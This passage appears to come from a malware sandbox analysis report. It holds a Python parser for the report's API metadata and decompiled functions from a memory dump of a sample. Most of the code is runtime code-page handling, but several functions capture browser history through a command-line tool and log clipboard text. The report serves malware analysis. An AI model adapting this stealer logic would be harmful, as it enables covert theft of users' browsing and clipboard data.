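    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)"
    r"\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of an 'APIs' section; blank or unrecognised lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not line.strip() or not m:
            continue
        raw_args = m.group("args")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=tuple(a.strip() for a in raw_args.split(",")) if raw_args else (),
            ref=int(m.group("ref"), 16) if m.group("ref") else None,
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def split_tokens(name: str) -> List[str]:
    """CamelCase split: 'CreateFileW' -> ['Create', 'File', 'W']; a name with
    no capitals such as '___vcrt_initialize_locks' stays a single token."""
    return re.findall(r"[A-Z][a-z0-9]*|[^A-Z]+", name)


def api_id(names: Iterable[str]) -> str:
    """Rebuild the record's 'API ID' from its API names.

    The rule is inferred (an assumption) from the records on this page: tokens of
    three characters or fewer (W, Ex, Get, One, Arg) are dropped; tokens that occur
    more than once come first, sorted and followed by '$'; the remaining tokens
    follow, also sorted; with no repeated token there is no '$'.
    """
    counts = Counter(t for n in names for t in split_tokens(n) if len(t) > 3)
    shared = sorted(t for t, c in counts.items() if c > 1)
    unique = sorted(t for t, c in counts.items() if c == 1)
    return "".join(shared) + ("$" if shared else "") + "".join(unique)


def sleep_ms(calls: Iterable[ApiCall]) -> List[int]:
    """Sleep() durations in milliseconds, decoded from the hex first argument."""
    return [int(c.args[0], 16) for c in calls
            if c.name == "Sleep" and c.args and c.args[0] != "?"]


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_APIS)
    print(api_id(c.name for c in calls))  # File$CloseCreateHandleSizeSleep
    print(sleep_ms(calls))                # [10000]
```

The numeric "API String ID" (1958988193-0 and the like) is a hash over this ID and the String ID and is not reproduced here. Because the ID is order-independent and ignores short tokens, two functions with the same set of significant API words share it, which is what lets the Similarity block compare functions across reports; it says nothing about argument values, so the 10-second Sleep in E00748BC0 is only visible in the parsed arguments, not in the ID.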

                      C-Code - Quality: 92%
                      			E00787399(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v22;
                      				char _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _t48;
                      				int _t51;
                      				signed int _t54;
                      				signed int _t55;
                      				short _t58;
                      				signed char _t62;
                      				signed int _t63;
                      				signed char* _t72;
                      				signed char* _t73;
                      				int _t78;
                      				signed int _t81;
                      				signed char* _t82;
                      				short* _t83;
                      				int _t87;
                      				signed char _t88;
                      				signed int _t89;
                      				signed int _t91;
                      				signed int _t92;
                      				int _t94;
                      				int _t95;
                      				intOrPtr _t98;
                      				signed int _t99;
                      
                      				_t48 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t48 ^ _t99;
                      				_t98 = _a8;
                      				_t78 = E00786F6C(__eflags, _a4);
                      				if(_t78 != 0) {
                      					_t94 = 0;
                      					__eflags = 0;
                      					_t81 = 0;
                      					_t51 = 0;
                      					_v32 = 0;
                      					while(1) {
                      						__eflags =  *((intOrPtr*)(_t51 + 0x7aa488)) - _t78;
                      						if( *((intOrPtr*)(_t51 + 0x7aa488)) == _t78) {
                      							break;
                      						}
                      						_t81 = _t81 + 1;
                      						_t51 = _t51 + 0x30;
                      						_v32 = _t81;
                      						__eflags = _t51 - 0xf0;
                      						if(_t51 < 0xf0) {
                      							continue;
                      						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) { // 0xfde8 = CP_UTF7
                      								L23:
                      							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) { // 0xfde9 = CP_UTF8
                      									goto L23;
                      								} else {
                      									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                      									__eflags = _t51;
                      									if(_t51 == 0) {
                      										goto L23;
                      									} else {
                      										_t7 =  &_v28; // 0x78723a
                      										_t51 = GetCPInfo(_t78, _t7);
                      										__eflags = _t51;
                      										if(_t51 == 0) {
                      											__eflags =  *0x7aba28 - _t94; // 0x0
                      											if(__eflags == 0) {
                      												goto L23;
                      											} else {
                      												E00786FDF(_t98);
                      												goto L37;
                      											}
                      										} else {
                      											E00771F00(_t94, _t98 + 0x18, _t94, 0x101);
                      											 *(_t98 + 4) = _t78;
                      											 *(_t98 + 0x21c) = _t94;
                      											_t78 = 1;
                      											__eflags = _v28 - 1;
                      											if(_v28 <= 1) {
                      												 *(_t98 + 8) = _t94;
                      											} else {
                      												__eflags = _v22;
                      												_t72 =  &_v22;
                      												if(_v22 != 0) {
                      													while(1) {
                      														_t88 = _t72[1];
                      														__eflags = _t88;
                      														if(_t88 == 0) {
                      															goto L16;
                      														}
                      														_t91 = _t88 & 0x000000ff;
                      														_t89 =  *_t72 & 0x000000ff;
                      														while(1) {
                      															__eflags = _t89 - _t91;
                      															if(_t89 > _t91) {
                      																break;
                      															}
                      															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                      															_t89 = _t89 + 1;
                      															__eflags = _t89;
                      														}
                      														_t72 =  &(_t72[2]);
                      														__eflags =  *_t72;
                      														if( *_t72 != 0) {
                      															continue;
                      														}
                      														goto L16;
                      													}
                      												}
                      												L16:
                      												_t73 = _t98 + 0x1a;
                      												_t87 = 0xfe;
                      												do {
                      													 *_t73 =  *_t73 | 0x00000008;
                      													_t73 =  &(_t73[1]);
                      													_t87 = _t87 - 1;
                      													__eflags = _t87;
                      												} while (_t87 != 0);
                      												 *(_t98 + 0x21c) = E00786F2E( *(_t98 + 4));
                      												 *(_t98 + 8) = _t78;
                      											}
                      											_t95 = _t98 + 0xc;
                      											asm("stosd");
                      											asm("stosd");
                      											asm("stosd");
                      											L36:
                      											E00787044(_t78, _t91, _t95, _t98, _t98);
                      											L37:
                      											__eflags = 0;
                      										}
                      									}
                      								}
                      							}
                      						}
                      						goto L39;
                      					}
                      					E00771F00(_t94, _t98 + 0x18, _t94, 0x101);
                      					_t54 = _v32 * 0x30;
                      					__eflags = _t54;
                      					_v36 = _t54;
                      					_t55 = _t54 + 0x7aa498;
                      					_v32 = _t55;
                      					do {
                      						__eflags =  *_t55;
                      						_t82 = _t55;
                      						if( *_t55 != 0) {
                      							while(1) {
                      								_t62 = _t82[1];
                      								__eflags = _t62;
                      								if(_t62 == 0) {
                      									break;
                      								}
                      								_t92 =  *_t82 & 0x000000ff;
                      								_t63 = _t62 & 0x000000ff;
                      								while(1) {
                      									__eflags = _t92 - _t63;
                      									if(_t92 > _t63) {
                      										break;
                      									}
                      									__eflags = _t92 - 0x100;
                      									if(_t92 < 0x100) {
                      										_t31 = _t94 + 0x7aa480; // 0x8040201
                      										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                      										_t92 = _t92 + 1;
                      										__eflags = _t92;
                      										_t63 = _t82[1] & 0x000000ff;
                      										continue;
                      									}
                      									break;
                      								}
                      								_t82 =  &(_t82[2]);
                      								__eflags =  *_t82;
                      								if( *_t82 != 0) {
                      									continue;
                      								}
                      								break;
                      							}
                      							_t55 = _v32;
                      						}
                      						_t94 = _t94 + 1;
                      						_t55 = _t55 + 8;
                      						_v32 = _t55;
                      						__eflags = _t94 - 4;
                      					} while (_t94 < 4);
                      					 *(_t98 + 4) = _t78;
                      					 *(_t98 + 8) = 1;
                      					 *(_t98 + 0x21c) = E00786F2E(_t78);
                      					_t83 = _t98 + 0xc;
                      					_t91 = _v36 + 0x7aa48c;
                      					_t95 = 6;
                      					do {
                      						_t58 =  *_t91;
                      						_t91 = _t91 + 2;
                      						 *_t83 = _t58;
                      						_t83 = _t83 + 2;
                      						_t95 = _t95 - 1;
                      						__eflags = _t95;
                      					} while (_t95 != 0);
                      					goto L36;
                      				} else {
                      					E00786FDF(_t98);
                      				}
                      				L39:
                      				return E0076FD1B(_v8 ^ _t99);
                      			}

                      APIs
                        • Part of subcall function 00786F6C: GetOEMCP.KERNEL32(00000000,?,?,007871F5,?), ref: 00786F97
                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0078723A,?,00000000), ref: 0078740D
                      • GetCPInfo.KERNEL32(00000000,:rx,?,?,?,0078723A,?,00000000), ref: 00787420
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CodeInfoPageValid
                      • String ID: :rx
                      • API String ID: 546120528-2506775342
                      • Opcode ID: bea2b102ed5cc60020b986cfd7eb4c1c887ac94f3912f3543f199fcc4b57d7a8
                      • Instruction ID: 8ee780daff6e7e9e236fab8604ecc6411327c219825f08c6e0a16f961d8b6b42
                      • Opcode Fuzzy Hash: bea2b102ed5cc60020b986cfd7eb4c1c887ac94f3912f3543f199fcc4b57d7a8
                      • Instruction Fuzzy Hash: 515138709482859EDB28EF35C485ABBBFA5EF41310F34806EE49B8B251E73DD941CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 73%
                      			E0077EE70(void* __ebx, void* __ecx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr* _a12) {
                      				signed int _v8;
                      				signed int _v12;
                      				void* _v20;
                      				signed int _t21;
                      				void* _t23;
                      				signed int _t27;
                      				signed int _t31;
                      				intOrPtr* _t35;
                      				intOrPtr* _t46;
                      				void* _t56;
                      				void* _t62;
                      				signed short* _t64;
                      				intOrPtr _t66;
                      				intOrPtr* _t68;
                      				intOrPtr _t70;
                      				signed int _t71;
                      				void* _t72;
                      				intOrPtr* _t74;
                      
                      				_t53 = __ebx;
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t21 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t21 ^ _t71;
                      				_t64 = _a4;
                      				if(_t64 != 0) {
                      					_t23 = E0078175F(__ebx, __ecx, _t64, _a8);
                      					_pop(_t56);
                      					if(_t23 < _a8) {
                      						_t68 = 0;
                      						_t26 =  *((intOrPtr*)( *_a12 + 0xa8));
                      						if( *((intOrPtr*)( *_a12 + 0xa8)) == 0) {
                      							while( *_t64 != _t68) {
                      								_t27 =  *_t64 & 0x0000ffff;
                      								if(_t27 >= 0x41 && _t27 <= 0x5a) {
                      									 *_t64 = _t27 + 0x20;
                      								}
                      								_t64 =  &(_t64[1]);
                      							}
                      							L29:
                      							return E0076FD1B(_v8 ^ _t71);
                      						}
                      						_t31 = E0078AFBB(__ebx, _t56, _t26, 0x100, _t64, 0xffffffff, 0, 0);
                      						_t74 = _t72 + 0x18;
                      						_v12 = _t31;
                      						if(_t31 != 0) {
                      							if(_a8 >= _t31) {
                      								_t62 = _t31 + _t31;
                      								_t59 = _t62 + 8;
                      								asm("sbb eax, eax");
                      								if((_t62 + 0x00000008 & _t31) == 0) {
                      									L23:
                      									if(_t68 != 0) {
                      										if(E0078AFBB(_t53, _t59,  *((intOrPtr*)( *_a12 + 0xa8)), 0x100, _t64, 0xffffffff, _t68, _v12) == 0) {
                      											_t35 = E0077A504();
                      											_t66 = 0x2a;
                      											 *_t35 = _t66;
                      										} else {
                      											_t66 = E007815D4(_t64, _a8, _t68);
                      										}
                      										L28:
                      										E00770BA0(_t68);
                      										goto L29;
                      									}
                      									L24:
                      									 *((intOrPtr*)(E0077A504())) = 0xc;
                      									_t66 =  *((intOrPtr*)(E0077A504()));
                      									goto L28;
                      								}
                      								asm("sbb eax, eax");
                      								_t41 = _t31 & _t62 + 0x00000008;
                      								_t59 = _t62 + 8;
                      								if((_t31 & _t62 + 0x00000008) > 0x400) {
                      									asm("sbb eax, eax");
                      									_t68 = E0077F98C(_t59, _t41 & _t59);
                      									_pop(_t59);
                      									if(_t68 == 0) {
                      										goto L24;
                      									}
                      									 *_t68 = 0xdddd;
                      									L22:
                      									_t68 = _t68 + 8;
                      									goto L23;
                      								}
                      								asm("sbb eax, eax");
                      								E00790810();
                      								_t68 = _t74;
                      								if(_t68 == 0) {
                      									goto L24;
                      								}
                      								 *_t68 = 0xcccc;
                      								goto L22;
                      							}
                      							 *_t64 = 0;
                      							_t46 = E0077A504();
                      							_push(0x22);
                      							L2:
                      							_pop(_t70);
                      							 *_t46 = _t70;
                      							E0077695D();
                      							goto L29;
                      						}
                      						 *((intOrPtr*)(E0077A504())) = 0x2a;
                      						E0077A504();
                      						goto L29;
                      					}
                      					 *_t64 = 0;
                      				}
                      				_t46 = E0077A504();
                      				_push(0x16);
                      				goto L2;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: __alloca_probe_16__freea
                      • String ID: :nu
                      • API String ID: 1635606685-229407438
                      • Opcode ID: 37b615a3918c9733b58bc373e5c0ca622a339e60a0ae7bfae952679aab7aec4c
                      • Instruction ID: 5a5f4c98be2c4b31ebba25e85687eb0ab7eaae5df10ddf6aeda10ab467cbe3dc
                      • Opcode Fuzzy Hash: 37b615a3918c9733b58bc373e5c0ca622a339e60a0ae7bfae952679aab7aec4c
                      • Instruction Fuzzy Hash: E441E471A00211EBEF21AF64CC45A6E77A4EF497A0B25C5B9F80CDB281EB3CD9508791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00787044(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
                      				signed int _v8;
                      				char _v264;
                      				char _v520;
                      				char _v776;
                      				char _v1800;
                      				char _v1814;
                      				struct _cpinfo _v1820;
                      				intOrPtr _v1824;
                      				signed int _v1828;
                      				signed int _t63;
                      				void* _t67;
                      				signed int _t68;
                      				intOrPtr _t69;
                      				void* _t72;
                      				char _t73;
                      				char _t74;
                      				signed char _t75;
                      				signed int _t76;
                      				signed char _t86;
                      				char _t87;
                      				char _t90;
                      				signed int _t93;
                      				signed int _t94;
                      				signed int _t95;
                      				void* _t96;
                      				char* _t97;
                      				intOrPtr _t101;
                      				signed int _t102;
                      
                      				_t95 = __edx;
                      				_t63 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t63 ^ _t102;
                      				_t2 =  &_a4; // 0x787576
                      				_t101 =  *_t2;
                      				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                      					_t96 = _t101 + 0x119;
                      					_t90 = 0;
                      					_t67 = 0xffffff9f;
                      					_t68 = _t67 - _t96;
                      					__eflags = _t68;
                      					_v1828 = _t68;
                      					do {
                      						_t97 = _t96 + _t90;
                      						_t69 = _t68 + _t97;
                      						_v1824 = _t69;
                      						__eflags = _t69 + 0x20 - 0x19;
                      						if(_t69 + 0x20 > 0x19) {
                      							__eflags = _v1824 - 0x19;
                      							if(_v1824 > 0x19) {
                      								 *_t97 = 0;
                      							} else {
                      								_t72 = _t101 + _t90;
                      								_t57 = _t72 + 0x19;
                      								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                      								__eflags =  *_t57;
                      								_t59 = _t90 - 0x20; // -32
                      								_t73 = _t59;
                      								goto L24;
                      							}
                      						} else {
                      							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                      							_t54 = _t90 + 0x20; // 0x20
                      							_t73 = _t54;
                      							L24:
                      							 *_t97 = _t73;
                      						}
                      						_t68 = _v1828;
                      						_t96 = _t101 + 0x119;
                      						_t90 = _t90 + 1;
                      						__eflags = _t90 - 0x100;
                      					} while (_t90 < 0x100);
                      				} else {
                      					_t74 = 0;
                      					do {
                      						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                      						_t74 = _t74 + 1;
                      					} while (_t74 < 0x100);
                      					_t75 = _v1814;
                      					_t93 =  &_v1814;
                      					_v264 = 0x20;
                      					while(1) {
                      						_t108 = _t75;
                      						if(_t75 == 0) {
                      							break;
                      						}
                      						_t95 =  *(_t93 + 1) & 0x000000ff;
                      						_t76 = _t75 & 0x000000ff;
                      						while(1) {
                      							__eflags = _t76 - _t95;
                      							if(_t76 > _t95) {
                      								break;
                      							}
                      							__eflags = _t76 - 0x100;
                      							if(_t76 < 0x100) {
                      								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                      								_t76 = _t76 + 1;
                      								__eflags = _t76;
                      								continue;
                      							}
                      							break;
                      						}
                      						_t93 = _t93 + 2;
                      						__eflags = _t93;
                      						_t75 =  *_t93;
                      					}
                      					E007893AC(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                      					E0078480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
                      					E0078480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                      					_t94 = 0;
                      					do {
                      						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                      						if((_t86 & 0x00000001) == 0) {
                      							__eflags = _t86 & 0x00000002;
                      							if((_t86 & 0x00000002) == 0) {
                      								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                      							} else {
                      								_t37 = _t101 + _t94 + 0x19;
                      								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                      								__eflags =  *_t37;
                      								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                      								goto L15;
                      							}
                      						} else {
                      							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                      							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                      							L15:
                      							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                      						}
                      						_t94 = _t94 + 1;
                      					} while (_t94 < 0x100);
                      				}
                      				return E0076FD1B(_v8 ^ _t102);
                      			}

                      APIs
                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00787069
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Info
                      • String ID: $vux
                      • API String ID: 1807457897-1952022575
                      • Opcode ID: 543a03f2215a2049a8d89450bfba67409789aeec4121e6fc34771d9b920a5983
                      • Instruction ID: cb64fe35477329346437e3ad92b3939696feee2635d29c17639da620424a91ec
                      • Opcode Fuzzy Hash: 543a03f2215a2049a8d89450bfba67409789aeec4121e6fc34771d9b920a5983
                      • Instruction Fuzzy Hash: DD41197094824C9EDF299E64CC88BF6BBA9DB45304F3404EDE59B87142D239DA45DF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E0074414D(void* __ebx) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				char _v172;
                      				short _v692;
                      				void* __edi;
                      				WCHAR* _t40;
                      				struct HINSTANCE__* _t81;
                      				struct HINSTANCE__* _t84;
                      				void* _t85;
                      
                      				_t48 = __ebx;
                      				_t81 = 0;
                      				GetModuleFileNameW(0,  &_v692, 0x104);
                      				E007420D5(__ebx,  &_v52);
                      				E0075800F( &_v28, 0x30, E00741F95(E00757093( &_v76)));
                      				E00741FC7();
                      				E00741F95(0x7ac1a0);
                      				E0075432B(E00741EEB(E007430A6(_t48,  &_v100, E00744429(_t48,  &_v124, E00744405(_t48,  &_v148,  &_v692, 0, E0074427F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				_t84 = 0;
                      				while(1) {
                      					_t40 = E00741EEB( &_v28);
                      					_t80 =  &_v52;
                      					if(E007579DC(_t40,  &_v52) != 0) {
                      						break;
                      					}
                      					Sleep(0xfa);
                      					_t84 =  &(_t84->i);
                      					if(_t84 < 0x14) {
                      						continue;
                      					} else {
                      					}
                      					L5:
                      					E00741EF0();
                      					E00741FC7();
                      					return _t81;
                      				}
                      				E007420EC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
                      				_push(0x9d);
                      				E00744AA4(_t48, 0x7ac138, _t80, __eflags);
                      				_t81 = 1;
                      				__eflags = 1;
                      				goto L5;
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00744167
                        • Part of subcall function 00757093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0074417D), ref: 007570BA
                        • Part of subcall function 0075432B: CloseHandle.KERNEL32(007441F6,?,007441F6,0079F464), ref: 00754341
                        • Part of subcall function 0075432B: CloseHandle.KERNEL32(0079F464,?,007441F6,0079F464), ref: 0075434A
                        • Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9
                      • Sleep.KERNEL32(000000FA,0079F464), ref: 00744239
                      Strings
                      • /sort "Visit Time" /stext ", xrefs: 007441B3
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                      • String ID: /sort "Visit Time" /stext "
                      • API String ID: 368326130-1573945896
                      • Opcode ID: c08a53a908675abbbe5e3e118eaf360d6d1493bf0328c55017da4afbb0fb8d78
                      • Instruction ID: 9ce3ed5a7e07eaeb7fb4f4c15c6caf38ca6559a777be976d32b5725ac7896f55
                      • Opcode Fuzzy Hash: c08a53a908675abbbe5e3e118eaf360d6d1493bf0328c55017da4afbb0fb8d78
                      • Instruction Fuzzy Hash: 68318431A10118EBCB18F7B4DC5EAEE7776AF91301F800169F906A71D2EF78598AC691
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00749C15(void* __ecx) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				void* __ebx;
                      				void* __esi;
                      				void* _t23;
                      				void* _t27;
                      				void* _t30;
                      				void* _t78;
                      				void* _t84;
                      				void* _t85;
                      
                      				_t85 = _t84 - 0x94;
                      				_t78 = __ecx;
                      				if( *0x7add24 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                      					E0076F114(0x7add24);
                      					_t88 =  *0x7add24 - 0xffffffff;
                      					if( *0x7add24 == 0xffffffff) {
                      						E00741F6D(0x7add28, 0x7add28);
                      						E0076F49E(_t88, E007927E5);
                      						E0076F0D5(0x7add24, 0x7add24);
                      					}
                      				}
                      				E00749BD9( &_v28);
                      				_t23 = E00749EAC(0x7add28);
                      				_t89 = _t23;
                      				if(_t23 == 0) {
                      					E00749DD2(0x7add28,  &_v28);
                      					_t27 = E007474E4(_t89);
                      					_t90 = _t27;
                      					if(_t27 != 0) {
                      						E00742084(0x7add28,  &_v76, "\r\n[End of clipboard]\r\n");
                      						E00742084(0x7add28,  &_v52, "\r\n[Text copied to clipboard]\r\n");
                      						_t30 = E007572DA( &_v148,  &_v76);
                      						E00743030(_t85 - 0x18, E00744429(0x7add28,  &_v100, E007572DA( &_v124,  &_v52), _t90, 0x7add28), _t30);
                      						E00748B80(_t78);
                      						E00741EF0();
                      						E00741EF0();
                      						E00741EF0();
                      						E00741FC7();
                      						E00741FC7();
                      					}
                      				}
                      				return E00741EF0();
                      			}

                      0x00749c1e
                      0x00749c33
                      0x00749c3b
                      0x00749c43
                      0x00749c48
                      0x00749c50
                      0x00749c54
                      0x00749c5e
                      0x00749c64
                      0x00749c6a
                      0x00749c50
                      0x00749c6f
                      0x00749c79
                      0x00749c7e
                      0x00749c80
                      0x00749c8c
                      0x00749c99
                      0x00749c9e
                      0x00749ca0
                      0x00749cae
                      0x00749cbb
                      0x00749cc9
                      0x00749cef
                      0x00749cf7
                      0x00749cff
                      0x00749d07
                      0x00749d12
                      0x00749d1a
                      0x00749d22
                      0x00749d22
                      0x00749ca0
                      0x00749d35

                      APIs
                        • Part of subcall function 0076F49E: __onexit.LIBCMT ref: 0076F4A4
                      • __Init_thread_footer.LIBCMT ref: 00749C64
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer__onexit
                      • String ID: [End of clipboard]$[Text copied to clipboard]
                      • API String ID: 1881088180-3686566968
                      • Opcode ID: b4981919addf1a54a68fd77be1a13f94eb16c00c86f58bda83f280c1d5aac73c
                      • Instruction ID: c52fb38429587d6906f867f543c1871377cd8e8000cb1b702b3a9cf7b6f50ddb
                      • Opcode Fuzzy Hash: b4981919addf1a54a68fd77be1a13f94eb16c00c86f58bda83f280c1d5aac73c
                      • Instruction Fuzzy Hash: 61218131A00118DACB18FBA4E89A9EEB379EF55310F800179FA0657593EF3C6D4BC650
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00789DB7(void* __ecx, signed int _a4, intOrPtr _a8) {
                      				int _v8;
                      				void* __esi;
                      				int _t15;
                      				int _t16;
                      				signed int _t17;
                      				signed int _t23;
                      				signed int _t25;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t30;
                      				void* _t31;
                      				intOrPtr _t32;
                      				intOrPtr _t33;
                      				intOrPtr* _t34;
                      				intOrPtr* _t36;
                      
                      				_push(__ecx);
                      				_t23 = _a4;
                      				_push(_t34);
                      				if(_t23 == 0) {
                      					L21:
                      					_t15 = E007823BA(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                      					__eflags = _t15;
                      					if(_t15 != 0) {
                      						_t16 = _v8;
                      						__eflags = _t16;
                      						if(_t16 == 0) {
                      							_t16 = GetACP();
                      						}
                      						L25:
                      						return _t16;
                      					}
                      					L22:
                      					_t16 = 0;
                      					goto L25;
                      				}
                      				_t17 = 0;
                      				if( *_t23 == 0) {
                      					goto L21;
                      				}
                      				_t34 = 0x799fa8;
                      				_t25 = _t23;
                      				while(1) {
                      					_t30 =  *_t25;
                      					if(_t30 !=  *_t34) {
                      						break;
                      					}
                      					if(_t30 == 0) {
                      						L7:
                      						_t26 = _t17;
                      						L9:
                      						if(_t26 == 0) {
                      							goto L21;
                      						}
                      						_t36 = 0x799fb0;
                      						_t27 = _t23;
                      						while(1) {
                      							_t31 =  *_t27;
                      							if(_t31 !=  *_t36) {
                      								break;
                      							}
                      							if(_t31 == 0) {
                      								L17:
                      								_t48 = _t17;
                      								if(_t17 != 0) {
                      									_t16 = E0077673F(_t23, _t23);
                      									goto L25;
                      								}
                      								if(E007823BA(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                      									goto L22;
                      								}
                      								_t16 = _v8;
                      								goto L25;
                      							}
                      							_t32 =  *((intOrPtr*)(_t27 + 2));
                      							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                      								break;
                      							}
                      							_t27 = _t27 + 4;
                      							_t36 = _t36 + 4;
                      							if(_t32 != 0) {
                      								continue;
                      							}
                      							goto L17;
                      						}
                      						asm("sbb eax, eax");
                      						_t17 = _t17 | 0x00000001;
                      						__eflags = _t17;
                      						goto L17;
                      					}
                      					_t33 =  *((intOrPtr*)(_t25 + 2));
                      					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                      						break;
                      					}
                      					_t25 = _t25 + 4;
                      					_t34 = _t34 + 4;
                      					if(_t33 != 0) {
                      						continue;
                      					}
                      					goto L7;
                      				}
                      				asm("sbb edx, edx");
                      				_t26 = _t25 | 0x00000001;
                      				__eflags = _t26;
                      				goto L9;
                      			}

                      0x00789dbc
                      0x00789dbd
                      0x00789dc0
                      0x00789dc4
                      0x00789e6a
                      0x00789e7e
                      0x00789e83
                      0x00789e85
                      0x00789e8b
                      0x00789e8e
                      0x00789e90
                      0x00789e92
                      0x00789e92
                      0x00789e98
                      0x00789e9d
                      0x00789e9d
                      0x00789e87
                      0x00789e87
                      0x00000000
                      0x00789e87
                      0x00789dca
                      0x00789dcf
                      0x00000000
                      0x00000000
                      0x00789dd5
                      0x00789dda
                      0x00789ddc
                      0x00789ddc
                      0x00789de2
                      0x00000000
                      0x00000000
                      0x00789de7
                      0x00789dfe
                      0x00789dfe
                      0x00789e07
                      0x00789e09
                      0x00000000
                      0x00000000
                      0x00789e0b
                      0x00789e10
                      0x00789e12
                      0x00789e12
                      0x00789e18
                      0x00000000
                      0x00000000
                      0x00789e1d
                      0x00789e3b
                      0x00789e3b
                      0x00789e3d
                      0x00789e62
                      0x00000000
                      0x00789e67
                      0x00789e5a
                      0x00000000
                      0x00000000
                      0x00789e5c
                      0x00000000
                      0x00789e5c
                      0x00789e1f
                      0x00789e27
                      0x00000000
                      0x00000000
                      0x00789e29
                      0x00789e2c
                      0x00789e32
